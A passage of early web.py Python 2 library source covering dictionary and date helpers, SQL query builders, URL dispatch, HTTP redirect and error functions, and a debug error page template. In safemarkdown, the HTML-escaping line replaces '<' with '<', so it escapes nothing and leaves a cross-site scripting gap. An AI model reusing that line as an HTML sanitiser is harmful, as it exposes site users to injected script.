seq = iter(seq)
while True:
yield [seq.next() for i in xrange(size)]
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i > self.c:
raise IndexError, "already passed "+str(i)
try:
while i < self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
"""Takes a dictionary like `{1:2, 3:4}` and returns `{2:1, 4:3}`."""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(dict_a, dict_b):
"""
Returns a dictionary consisting of the keys in `a` and `b`.
If they share a key, the value from b is used.
"""
result = {}
result.update(dict_a)
result.update(dict_b)
return result
sumdicts = dictadd # deprecated
def listget(lst, ind, default=None):
"""Returns `lst[ind]` if it exists, `default` otherwise."""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""Returns `integer` as an int or `default` if it can't."""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""Converts a (UTC) datetime object to a nice string representation."""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not now: now = datetime.datetime.utcnow()
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def upvars(level=2):
"""Guido van Rossum doesn't want you to use this function."""
return dictadd(
sys._getframe(level).f_globals,
sys._getframe(level).f_locals)
class CaptureStdout:
"""
Captures everything func prints to stdout and returns it instead.
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, tempfile ##, time already imported
temp = tempfile.NamedTemporaryFile()
prof = hotshot.Profile(temp.name)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
stats = hotshot.stats.load(temp.name)
stats.strip_dirs()
stats.sort_stats('time', 'calls')
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += capturestdout(stats.print_stats)(40)
x += capturestdout(stats.print_callers)()
return result, x
profile = Profile
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict:
"""
Takes a dictionary that maps threads to objects.
When a thread tries to get or set an attribute or item
of the threadeddict, it passes it on to the object
for that thread in dictionary.
"""
def __init__(self, dictionary):
self.__dict__['_ThreadedDict__d'] = dictionary
def __getattr__(self, attr):
return getattr(self.__d[currentThread()], attr)
def __getitem__(self, item):
return self.__d[currentThread()][item]
def __setattr__(self, attr, value):
if attr == '__doc__':
self.__dict__[attr] = value
else:
return setattr(self.__d[currentThread()], attr, value)
def __setitem__(self, item, value):
self.__d[currentThread()][item] = value
def __hash__(self):
return hash(self.__d[currentThread()])
threadeddict = ThreadedDict
## IP Utilities
def validipaddr(address):
"""returns True if `address` is a valid IPv4 address"""
try:
octets = address.split('.')
assert len(octets) == 4
for x in octets:
assert 0 <= int(x) <= 255
except (AssertionError, ValueError):
return False
return True
def validipport(port):
"""returns True if `port` is a valid IPv4 port"""
try:
assert 0 <= int(port) <= 65535
except (AssertionError, ValueError):
return False
return True
def validip(ip, defaultaddr="0.0.0.0", defaultport=8080):
"""returns `(ip_address, port)` from string `ip_addr_port`"""
addr = defaultaddr
port = defaultport
ip = ip.split(":", 1)
if len(ip) == 1:
if not ip[0]:
pass
elif validipaddr(ip[0]):
addr = ip[0]
elif validipport(ip[0]):
port = int(ip[0])
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
elif len(ip) == 2:
addr, port = ip
if not validipaddr(addr) and validipport(port):
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
port = int(port)
else:
raise ValueError, ':'.join(ip) + ' is not a valid IP address/port'
return (addr, port)
def validaddr(string_):
"""returns either (ip_address, port) or "/path/to/socket" from string_"""
if '/' in string_:
return string_
else:
return validip(string_)
## URL Utilities
def prefixurl(base=''):
"""
Sorry, this function is really difficult to explain.
Maybe some other time.
"""
url = ctx.path.lstrip('/')
for i in xrange(url.count('/')):
base += '../'
if not base:
base = './'
return base
def urlquote(x): return urllib.quote(websafe(x).encode('utf-8'))
## Formatting
try:
from markdown import markdown # http://webpy.org/markdown.py
except ImportError:
pass
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
if text:
text = text.replace('<', '<')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
## Databases
class _ItplError(ValueError):
"""String Interpolation Error
from <http://lfw.org/python/Itpl.py>
(cf. below for license)
"""
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
def _interpolate(format):
"""
Takes a format string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
def matchorfail(text, pos):
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_";
chunks = []
pos = 0
while 1:
dollar = format.find("$", pos)
if dollar < 0:
break
nextchar = format[dollar + 1]
if nextchar == "{":
chunks.append((0, format[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format[pos:dollar]))
match, pos = matchorfail(format, dollar + 1)
while pos < len(format):
if format[pos] == "." and \
pos + 1 < len(format) and format[pos + 1] in namechars:
match, pos = matchorfail(format, pos + 1)
elif format[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format[dollar + 1:pos]))
else:
chunks.append((0, format[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format):
chunks.append((0, format[pos:]))
return chunks
def sqlors(left, lst):
"""
`left is a SQL clause like `tablename.arg = `
and `lst` is a list of values. Returns a reparam-style
pair featuring the SQL that ORs together the clause
for each item in the lst.
For example:
web.sqlors('foo =', [1,2,3])
would result in:
foo = 1 OR foo = 2 OR foo = 3
"""
if isinstance(lst, iters):
lst = list(lst)
ln = len(lst)
if ln == 0:
return ("2+2=5", [])
if ln == 1:
lst = lst[0]
if isinstance(lst, iters):
return '(' + left + \
(' OR ' + left).join([aparam() for param in lst]) + ")", lst
else:
return left + aparam(), [lst]
class UnknownParamstyle(Exception):
"""raised for unsupported db paramstyles
Currently supported: qmark,numeric, format, pyformat
"""
pass
def aparam():
"""Use in a SQL string to make a spot for a db value."""
style = ctx.db_module.paramstyle
if style == 'qmark':
return '?'
elif style == 'numeric':
return ':1'
elif style in ['format', 'pyformat']:
return '%s'
raise UnknownParamstyle, style
def reparam(string_, dictionary):
"""
Takes a string and a dictionary and interpolates the string
using values from the dictionary. Returns a 2-tuple containing
the a string with `aparam()`s in it and a list of the matching values.
You can pass this sort of thing as a clause in any db function.
Otherwise, you can pass a dictionary to the keyword argument `vars`
and the function will call reparam for you.
"""
vals = []
result = []
for live, chunk in _interpolate(string_):
if live:
result.append(aparam())
vals.append(eval(chunk, dictionary))
else: result.append(chunk)
return ''.join(result), vals
class UnknownDB(Exception):
"""raised for unsupported dbms"""
pass
def connect(dbn, **keywords):
"""
Connects to the specified database.
db currently must be "postgres" or "mysql".
If DBUtils is installed, connection pooling will be used.
"""
if dbn == "postgres":
try:
import psycopg2 as db
except ImportError:
try:
import psycopg as db
except ImportError:
import pgdb as db
keywords['password'] = keywords['pw']
del keywords['pw']
keywords['database'] = keywords['db']
del keywords['db']
elif dbn == "mysql":
import MySQLdb as db
keywords['passwd'] = keywords['pw']
del keywords['pw']
db.paramstyle = 'pyformat' # it's both, like psycopg
elif dbn == "sqlite":
try: ## try first sqlite3 version
from pysqlite2 import dbapi2 as db
db.paramstyle = 'qmark'
except ImportError: ## else try sqlite2
import sqlite as db
keywords['database'] = keywords['db']
del keywords['db']
else:
raise UnknownDB, dbn
ctx.db_name = dbn
ctx.db_module = db
ctx.db_transaction = False
if _hasPooling:
if 'db' not in globals():
globals()['db'] = PooledDB(dbapi=db, **keywords)
ctx.db = globals()['db'].connection()
else:
ctx.db = db.connect(**keywords)
ctx.dbq_count = 0
if globals().get('db_printing'):
def db_execute(cur, sql_query, d=None):
"""executes an sql query"""
def sqlquote(obj):
"""converts `obj` to its proper SQL version"""
# because `1 == True and hash(1) == hash(True)`
# we have to do this the hard way...
if obj is None:
return 'NULL'
elif obj is True:
return "'t'"
elif obj is False:
return "'f'"
elif isinstance(obj, datetime.datetime):
return repr(obj.isoformat())
else:
return repr(obj)
ctx.dbq_count += 1
try:
outq = sql_query % tuple(map(sqlquote, d))
except TypeError:
outq = sql_query
print >> debug, str(ctx.dbq_count)+':', outq
a = time.time()
out = cur.execute(sql_query, d)
b = time.time()
print >> debug, '(%s)' % round(b - a, 2)
return out
ctx.db_execute = db_execute
else:
ctx.db_execute = lambda cur, sql_query, d=None: \
cur.execute(sql_query, d)
return ctx.db
def transact():
"""Start a transaction."""
# commit everything up to now, so we don't rollback it later
ctx.db.commit()
ctx.db_transaction = True
def commit():
"""Commits a transaction."""
ctx.db.commit()
ctx.db_transaction = False
def rollback():
"""Rolls back a transaction."""
ctx.db.rollback()
ctx.db_transaction = False
def query(sql_query, vars=None, processed=False):
"""
Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
If `processed=True`, `vars` is a `reparam`-style list to use
instead of interpolating.
"""
if vars is None:
vars = {}
db_cursor = ctx.db.cursor()
if not processed:
sql_query, vars = reparam(sql_query, vars)
ctx.db_execute(db_cursor, sql_query, vars)
if db_cursor.description:
names = [x[0] for x in db_cursor.description]
def iterwrapper():
row = db_cursor.fetchone()
while row:
yield Storage(dict(zip(names, row)))
row = db_cursor.fetchone()
out = iterbetter(iterwrapper())
out.__len__ = lambda: int(db_cursor.rowcount)
out.list = lambda: [Storage(dict(zip(names, x))) \
for x in db_cursor.fetchall()]
else:
out = db_cursor.rowcount
if not ctx.db_transaction:
ctx.db.commit()
return out
def sqllist(lst):
"""
If a list, converts it to a comma-separated string.
Otherwise, returns the string.
"""
if isinstance(lst, str):
return lst
else: return ', '.join(lst)
def sqlwhere(dictionary):
"""
Converts a `dictionary` to an SQL WHERE clause in
`reparam` format. Thus,
{'cust_id': 2, 'order_id':3}
would result in the equivalent of:
'cust_id = 2 AND order_id = 3'
but properly quoted.
"""
return ' AND '.join([
'%s = %s' % (k, aparam()) for k in dictionary.keys()
]), dictionary.values()
def select(tables, vars=None, what='*', where=None, order=None, group=None,
limit=None, offset=None):
"""
Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset. Uses vars to interpolate.
Otherwise, each clause can take a reparam-style list.
"""
if vars is None:
vars = {}
values = []
qout = ""
for (sql, val) in (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset)):
if isinstance(val, (int, long)):
if sql == 'WHERE':
nquery, nvalue = 'id = '+aparam(), [val]
else:
nquery, nvalue = str(val), ()
elif isinstance(val, (list, tuple)) and len(val) == 2:
nquery, nvalue = val
elif val:
nquery, nvalue = reparam(val, vars)
else:
continue
qout += " " + sql + " " + nquery
values.extend(nvalue)
return query(qout, values, processed=True)
def insert(tablename, seqname=None, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
"""
db_cursor = ctx.db.cursor()
if values:
sql_query, v = "INSERT INTO %s (%s) VALUES (%s)" % (
tablename,
", ".join(values.keys()),
', '.join([aparam() for x in values])
), values.values()
else:
sql_query, v = "INSERT INTO %s DEFAULT VALUES" % tablename, None
if seqname is False:
pass
elif ctx.db_name == "postgres":
if seqname is None:
seqname = tablename + "_id_seq"
sql_query += "; SELECT currval('%s')" % seqname
elif ctx.db_name == "mysql":
ctx.db_execute(db_cursor, sql_query, v)
sql_query = "SELECT last_insert_id()"
v = ()
elif ctx.db_name == "sqlite":
ctx.db_execute(db_cursor, sql_query, v)
# not really the same...
sql_query = "SELECT last_insert_rowid()"
v = ()
ctx.db_execute(db_cursor, sql_query, v)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not ctx.db_transaction:
ctx.db.commit()
return out
def update(tables, where, vars=None, **values):
"""
Update `tables` with clause `where` (interpolated using `vars`)
and setting `values`.
"""
if vars is None:
vars = {}
if isinstance(where, (int, long)):
vars = [where]
where = "id = " + aparam()
elif isinstance(where, (list, tuple)) and len(where) == 2:
where, vars = where
else:
where, vars = reparam(where, vars)
db_cursor = ctx.db.cursor()
ctx.db_execute(db_cursor, "UPDATE %s SET %s WHERE %s" % (
sqllist(tables),
', '.join([k + '=' + aparam() for k in values.keys()]),
where),
values.values() + vars)
if not ctx.db_transaction:
ctx.db.commit()
return db_cursor.rowcount
def delete(table, where, using=None, vars=None):
"""
Deletes from `table` with clauses `where` and `using`.
"""
if vars is None:
vars = {}
db_cursor = ctx.db.cursor()
if isinstance(where, (int, long)):
vars = [where]
where = "id = " + aparam()
elif isinstance(where, (list, tuple)) and len(where) == 2:
where, vars = where
else:
where, vars = reparam(where, vars)
q = 'DELETE FROM %s WHERE %s' % (table, where)
if using:
q += ' USING ' + sqllist(using)
ctx.db_execute(db_cursor, q, vars)
if not ctx.db_transaction:
ctx.db.commit()
return db_cursor.rowcount
## Request Handlers
def handle(mapping, fvars=None):
"""
Call the appropriate function based on the url to function mapping in `mapping`.
If no module for the function is specified, look up the function in `fvars`. If
`fvars` is empty, using the caller's context.
`mapping` should be a tuple of paired regular expressions with function name
substitutions. `handle` will import modules as necessary.
"""
for url, ofno in group(mapping, 2):
if isinstance(ofno, tuple):
ofn, fna = ofno[0], list(ofno[1:])
else:
ofn, fna = ofno, []
fn, result = re_subm('^' + url + '$', ofn, ctx.path)
if result: # it's a match
if fn.split(' ', 1)[0] == "redirect":
url = fn.split(' ', 1)[1]
if ctx.method == "GET":
x = ctx.env.get('QUERY_STRING', '')
if x:
url += '?' + x
return redirect(url)
elif '.' in fn:
x = fn.split('.')
mod, cls = '.'.join(x[:-1]), x[-1]
mod = __import__(mod, globals(), locals(), [""])
cls = getattr(mod, cls)
else:
cls = fn
mod = fvars or upvars()
if isinstance(mod, types.ModuleType):
mod = vars(mod)
try:
cls = mod[cls]
except KeyError:
return notfound()
meth = ctx.method
if meth == "HEAD":
if not hasattr(cls, meth):
meth = "GET"
if not hasattr(cls, meth):
return nomethod(cls)
tocall = getattr(cls(), meth)
args = list(result.groups())
for d in re.findall(r'\\(\d+)', ofn):
args.pop(int(d) - 1)
return tocall(*([urllib.unquote(x) for x in args] + fna))
return notfound()
def autodelegate(prefix=''):
"""
Returns a method that takes one argument and calls the method named prefix+arg,
calling `notfound()` if there isn't one. Example:
urls = ('/prefs/(.*)', 'prefs')
class prefs:
GET = autodelegate('GET_')
def GET_password(self): pass
def GET_privacy(self): pass
`GET_password` would get called for `/prefs/password` while `GET_privacy` for
`GET_privacy` gets called for `/prefs/privacy`.
If a user visits `/prefs/password/change` then `GET_password(self, '/change')`
is called.
"""
def internal(self, arg):
if '/' in arg:
first, rest = arg.split('/', 1)
func = prefix + first
args = ['/' + rest]
else:
func = prefix + arg
args = []
if hasattr(self, func):
try:
return getattr(self, func)(*args)
except TypeError:
return notfound()
else:
return notfound()
return internal
def background(func):
"""A function decorator to run a long-running function as a background thread."""
def internal(*a, **kw):
data() # cache it
ctx = _context[currentThread()]
_context[currentThread()] = storage(ctx.copy())
def newfunc():
_context[currentThread()] = ctx
func(*a, **kw)
t = threading.Thread(target=newfunc)
background.threaddb[id(t)] = t
t.start()
ctx.headers = []
return seeother(changequery(_t=id(t)))
return internal
background.threaddb = {}
def backgrounder(func):
def internal(*a, **kw):
i = input(_method='get')
if '_t' in i:
try:
t = background.threaddb[int(i._t)]
except KeyError:
return notfound()
_context[currentThread()] = _context[t]
return
else:
return func(*a, **kw)
return internal
## HTTP Functions
def httpdate(date_obj):
"""Formats a datetime object for use in HTTP headers."""
return date_obj.strftime("%a, %d %b %Y %H:%M:%S GMT")
def parsehttpdate(string_):
"""Parses an HTTP date into a datetime object."""
try:
t = time.strptime(string_, "%a, %d %b %Y %H:%M:%S %Z")
except ValueError:
return None
return datetime.datetime(*t[:6])
def expires(delta):
"""
Outputs an `Expires` header for `delta` from now.
`delta` is a `timedelta` object or a number of seconds.
"""
try:
datetime
except NameError:
raise Exception, "requires Python 2.3 or later"
if isinstance(delta, (int, long)):
delta = datetime.timedelta(seconds=delta)
date_obj = datetime.datetime.utcnow() + delta
header('Expires', httpdate(date_obj))
def lastmodified(date_obj):
"""Outputs a `Last-Modified` header for `datetime`."""
header('Last-Modified', httpdate(date_obj))
def modified(date=None, etag=None):
n = ctx.env.get('HTTP_IF_NONE_MATCH')
m = parsehttpdate(ctx.env.get('HTTP_IF_MODIFIED_SINCE', '').split(';')[0])
validate = False
if etag:
raise NotImplementedError, "no etag support yet"
# should really be a warning
if date and m:
# we subtract a second because
# HTTP dates don't have sub-second precision
if date-datetime.timedelta(seconds=1) <= m:
validate = True
if validate: ctx.status = '304 Not Modified'
return not validate
"""
By default, these all return simple error messages that send very short messages
(like "bad request") to the user. They can and should be overridden
to return nicer ones.
"""
def redirect(url, status='301 Moved Permanently'):
"""
Returns a `status` redirect to the new URL.
`url` is joined with the base URL so that things like
`redirect("about") will work properly.
"""
newloc = urlparse.urljoin(ctx.home + ctx.path, url)
ctx.status = status
ctx.output = ''
header('Content-Type', 'text/html')
header('Location', newloc)
# seems to add a three-second delay for some reason:
# output('<a href="'+ newloc + '">moved permanently</a>')
def found(url):
"""A `302 Found` redirect."""
return redirect(url, '302 Found')
def seeother(url):
"""A `303 See Other` redirect."""
return redirect(url, '303 See Other')
def tempredirect(url):
"""A `307 Temporary Redirect` redirect."""
return redirect(url, '307 Temporary Redirect')
def badrequest():
"""Return a `400 Bad Request` error."""
ctx.status = '400 Bad Request'
header('Content-Type', 'text/html')
return output('bad request')
def notfound():
"""Returns a `404 Not Found` error."""
ctx.status = '404 Not Found'
header('Content-Type', 'text/html')
return output('not found')
def nomethod(cls):
"""Returns a `405 Method Not Allowed` error for `cls`."""
ctx.status = '405 Method Not Allowed'
header('Content-Type', 'text/html')
header('Allow', \
', '.join([method for method in \
['GET', 'HEAD', 'POST', 'PUT', 'DELETE'] \
if hasattr(cls, method)]))
# commented out for the same reason redirect is
# return output('method not allowed')
def gone():
"""Returns a `410 Gone` error."""
ctx.status = '410 Gone'
header('Content-Type', 'text/html')
return output("gone")
def internalerror():
"""Returns a `500 Internal Server` error."""
ctx.status = "500 Internal Server Error"
ctx.headers = [('Content-Type', 'text/html')]
ctx.output = "internal server error"
# adapted from Django <djangoproject.com>
# Copyright (c) 2005, the Lawrence Journal-World
# Used under the modified BSD license:
# http://www.xfree86.org/3.3.6/COPYRIGHT2.html#5
DJANGO_500_PAGE = """#import inspect
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="NONE,NOARCHIVE" />
<title>$exception_type at $ctx.path</title>
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; }
h2 { margin-bottom:.8em; }
h2 span { font-size:80%; color:#666; font-weight:normal; }
h3 { margin:1em 0 .5em 0; }
h4 { margin:0 0 .5em 0; font-weight: normal; }
table {
border:1px solid #ccc; border-collapse: collapse; background:white; }
tbody td, tbody th { vertical-align:top; padding:2px 3px; }
thead th {
padding:1px 6px 1px 3px; background:#fefefe; text-align:left;
font-weight:normal; font-size:11px; border:1px solid #ddd; }
tbody th { text-align:right; color:#666; padding-right:.5em; }
table.vars { margin:5px 0 2px 40px; }
table.vars td, table.req td { font-family:monospace; }
table td.code { width:100%;}
table td.code div { overflow:hidden; }
table.source th { color:#666; }
table.source td {
font-family:monospace; white-space:pre; border-bottom:1px solid #eee; }
ul.traceback { list-style-type:none; }
ul.traceback li.frame { margin-bottom:1em; }
div.context { margin: 10px 0; }
div.context ol {
padding-left:30px; margin:0 10px; list-style-position: inside; }
div.context ol li {
font-family:monospace; white-space:pre; color:#666; cursor:pointer; }
div.context ol.context-line li { color:black; background-color:#ccc; }
div.context ol.context-line li span { float: right; }
div.commands { margin-left: 40px; }
div.commands a { color:black; text-decoration:none; }
#summary { background: #ffc; }
#summary h2 { font-weight: normal; color: #666; }
#explanation { background:#eee; }
#template, #template-not-exist { background:#f6f6f6; }
#template-not-exist ul { margin: 0 0 0 20px; }
#traceback { background:#eee; }
#requestinfo { background:#f6f6f6; padding-left:120px; }
#summary table { border:none; background:transparent; }
#requestinfo h2, #requestinfo h3 { position:relative; margin-left:-100px; }
#requestinfo h3 { margin-bottom:-1em; }
.error { background: #ffc; }
.specific { color:#cc3300; font-weight:bold; }
</style>
<script type="text/javascript">
//<!--
function getElementsByClassName(oElm, strTagName, strClassName){
// Written by Jonathan Snook, http://www.snook.ca/jon;
// Add-ons by Robert Nyman, http://www.robertnyman.com
var arrElements = (strTagName == "*" && document.all)? document.all :
oElm.getElementsByTagName(strTagName);
var arrReturnElements = new Array();
strClassName = strClassName.replace(/\-/g, "\\-");
var oRegExp = new RegExp("(^|\\s)" + strClassName + "(\\s|$)");
var oElement;
for(var i=0; i<arrElements.length; i++){
oElement = arrElements[i];
if(oRegExp.test(oElement.className)){
arrReturnElements.push(oElement);
}
}
return (arrReturnElements)
}
function hideAll(elems) {
for (var e = 0; e < elems.length; e++) {
elems[e].style.display = 'none';
}
}
window.onload = function() {
hideAll(getElementsByClassName(document, 'table', 'vars'));
hideAll(getElementsByClassName(document, 'ol', 'pre-context'));
hideAll(getElementsByClassName(document, 'ol', 'post-context'));
}
function toggle() {
for (var i = 0; i < arguments.length; i++) {
var e = document.getElementById(arguments[i]);
if (e) {
e.style.display = e.style.display == 'none' ? 'block' : 'none';
}
}
return false;
}
function varToggle(link, id) {
toggle('v' + id);
var s = link.getElementsByTagName('span')[0];
var uarr = String.fromCharCode(0x25b6);
var darr = String.fromCharCode(0x25bc);
s.innerHTML = s.innerHTML == uarr ? darr : uarr;
return false;
}
//-->
</script>
</head>
<body>
<div id="summary">
<h1>$exception_type at $ctx.path</h1>
<h2>$exception_value</h2>
<table><tr>
<th>Python</th>
<td>$lastframe.filename in $lastframe.function, line $lastframe.lineno</td>
</tr><tr>
<th>Web</th>
<td>$ctx.method $ctx.home$ctx.path</td>
</tr></table>
</div>
<div id="traceback">
<h2>Traceback <span>(innermost first)</span></h2>
<ul class="traceback">
#for frame in $frames
<li class="frame">
<code>$frame.filename</code> in <code>$frame.function</code>
#if $frame.context_line
<div class="context" id="c$frame.id">
#if $frame.pre_context
<ol start="$frame.pre_context_lineno" class="pre-context" id="pre$frame.id">#for line in $frame.pre_context#<li onclick="toggle('pre$frame.id', 'post$frame.id')">$line</li>#end for#</ol>
#end if
<ol start="$frame.lineno" class="context-line"><li onclick="toggle('pre$frame.id', 'post$frame.id')">$frame.context_line <span>...</span></li></ol>
#if $frame.post_context
<ol start='$(frame.lineno+1)' class="post-context" id="post$frame.id">#for line in $frame.post_context#<li onclick="toggle('pre$frame.id', 'post$frame.id')">$line</li>#end for#</ol>
#end if
</div>
#end if
#if $frame.vars
<div class="commands">
<a href='#' onclick="return varToggle(this, '$frame.id')"><span>▶</span> Local vars</a>## $inspect.formatargvalues(*inspect.getargvalues(frame['tb'].tb_frame))
</div>
<table class="vars" id="v$frame.id">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set frameitems = $frame.vars
#silent frameitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in frameitems
<tr>
<td>$key</td>
<td class="code"><div>$prettify(val)</div></td>
</tr>
#end for
</tbody>
</table>
#end if
</li>
#end for
</ul>
</div>
<div id="requestinfo">
#if $context_.output or $context_.headers
<h2>Response so far</h2>
<h3>HEADERS</h3>
#if $ctx.headers
<p class="req"><code>
#for (k, v) in $context_.headers
$k: $v<br />
#end for
</code></p>
#else
<p>No headers.</p>
#end if
<h3>BODY</h3>
<p class="req" style="padding-bottom: 2em"><code>
$context_.output
</code></p>
#end if
<h2>Request information</h2>
<h3>INPUT</h3>
#if $input_
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $input_.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in myitems
<tr>
<td>$key</td>
<td class="code"><div>$val</div></td>
</tr>
#end for
</tbody>
</table>
#else
<p>No input data.</p>
#end if
<h3 id="cookie-info">COOKIES</h3>
#if $cookies_
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#for (key, val) in $cookies_.items()
<tr>
<td>$key</td>
<td class="code"><div>$val</div></td>
</tr>
#end for
</tbody>
</table>
#else
<p>No cookie data</p>
#end if
<h3 id="meta-info">META</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $context_.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in $myitems
#if not $key.startswith('_') and $key not in ['env', 'output', 'headers', 'environ', 'status', 'db_execute']
<tr>
<td>$key</td>
<td class="code"><div>$prettify($val)</div></td>
</tr>
#end if
#end for
</tbody>
</table>
<h3 id="meta-info">ENVIRONMENT</h3>
<table class="req">
<thead>
<tr>
<th>Variable</th>
<th>Value</th>
</tr>
</thead>
<tbody>
#set myitems = $context_.env.items()
#silent myitems.sort(lambda x,y: cmp(x[0], y[0]))
#for (key, val) in $myitems
<tr>
<td>$key</td>
<td class="code"><div>$prettify($val)</div></td>
</tr>
#end for
</tbody>
</table>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>web.internalerror</code>
set to <code>web.debugerror</code>. Change that if you want a different one.
</p>
</div>
</body>
</html>"""
def djangoerror():
def _get_lines_from_file(filename, lineno, context_lines):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
try:
source = open(filename).readlines()
lower_bound = max(0, lineno - context_lines)
upper_bound = lineno + context_lines
pre_context = \
[line.strip('\n') for line in source[lower_bound:lineno]]
context_line = source[lineno].strip('\n')
post_context = \
